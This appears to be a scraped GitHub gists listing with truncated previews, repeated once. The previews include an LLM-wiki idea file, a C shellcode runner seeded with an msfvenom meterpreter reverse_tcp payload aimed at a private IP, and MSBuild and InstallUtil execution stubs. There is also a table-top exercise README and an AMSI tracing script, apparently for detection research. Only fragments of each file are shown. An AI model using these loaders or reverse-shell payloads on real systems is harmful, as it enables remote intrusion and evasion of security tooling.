Joe Desimone joe-desimone

## llm-wiki.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                joe-desimone
                / llm-wiki.md
            
            
              Created
              April 4, 2026 17:24
                — forked from karpathy/llm-wiki.md
            
              
                llm-wiki
              
          
    LLM Wiki

A pattern for building personal knowledge bases using LLMs.
This is an idea file, it is designed to be copy pasted to your own LLM Agent (e.g. OpenAI Codex, Claude Code, OpenCode / Pi, or etc.). Its goal is to communicate the high level idea, but your agent will build out the specifics in collaboration with you.
The core idea

Most people's experience with LLMs and documents looks like RAG: you upload a collection of files, the LLM retrieves relevant chunks at query time, and generates an answer. This works, but the LLM is rediscovering knowledge from scratch on every question. There's no accumulation. Ask a subtle question that requires synthesizing five documents, and the LLM has to find and piece together the relevant fragments every time. Nothing is built up. NotebookLM, ChatGPT file uploads, and most RAG systems work this way.

  
## RtlRunOnceExecuteOnceShellcodeExec.c
#include <windows.h>
#include <stdio.h>

extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);

// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"

## README.md

      
              2 files
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                joe-desimone
                / README.md
            
            
              Created
              October 17, 2022 14:17
            
              
                Table Top With Teeth - Training Exercise 
              
          
    Instructions

The following script is designed to create artifacts that teams can use to hunt, new or interesting capabilities.
The following table top is based on the code here: https://github.com/code-scrap/DynamicWrapperDotNet
This script is self-contained.  It should dynamically write a DLL to disk and load it in to cscript.exe
To Invoke cscript.exe stranger_things.js
This example expects a 64bit system.

  
## gist:f2a3564e74621169540e26499c4588ad
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!--

		Author: Casey Smith, Twitter: @subTee

		License: BSD 3-Clause


## Snapit.cs
using Microsoft.ManagementConsole;
using System.ComponentModel;
using System;
using System.Security.Permissions;
using System.Collections;


/*
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library  /reference:C:\Windows\assembly\GAC_MSIL\microsoft.managementconsole\3.0.0.0__31bf3856ad364e35\microsoft.managementconsole.dll .\Snapit.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe SnapIt.dll

## AMSIScriptContentRetrieval.ps1
# Script author: Matt Graeber (@mattifestation)
# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# Do your malicious things here that would be logged by AMSI
# logman stop AMSITrace -ets

$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture
$OSArch = $OSArchProperty.OSArchitecture

$OSPointerSize = 32
if ($OSArch -eq '64-bit') { $OSPointerSize = 64 }
	#include <windows.h>
	#include <stdio.h>

	extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE once, PRTL_RUN_ONCE_INIT_FN func, void param, void **context);
	typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);

	// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
	unsigned char shellcode_bin[] =
	"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
	"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
	<Target Name="Hello" >

	<!-- Call ANY .NET API -->
	<!--

	Author: Casey Smith, Twitter: @subTee

	License: BSD 3-Clause
	using Microsoft.ManagementConsole;
	using System.ComponentModel;
	using System;
	using System.Security.Permissions;
	using System.Collections;


	/*
	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /reference:C:\Windows\assembly\GAC_MSIL\microsoft.managementconsole\3.0.0.0__31bf3856ad364e35\microsoft.managementconsole.dll .\Snapit.cs
	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe SnapIt.dll
	# Script author: Matt Graeber (@mattifestation)
	# logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
	# Do your malicious things here that would be logged by AMSI
	# logman stop AMSITrace -ets

	$OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture
	$OSArch = $OSArchProperty.OSArchitecture

	$OSPointerSize = 32
	if ($OSArch -eq '64-bit') { $OSPointerSize = 64 }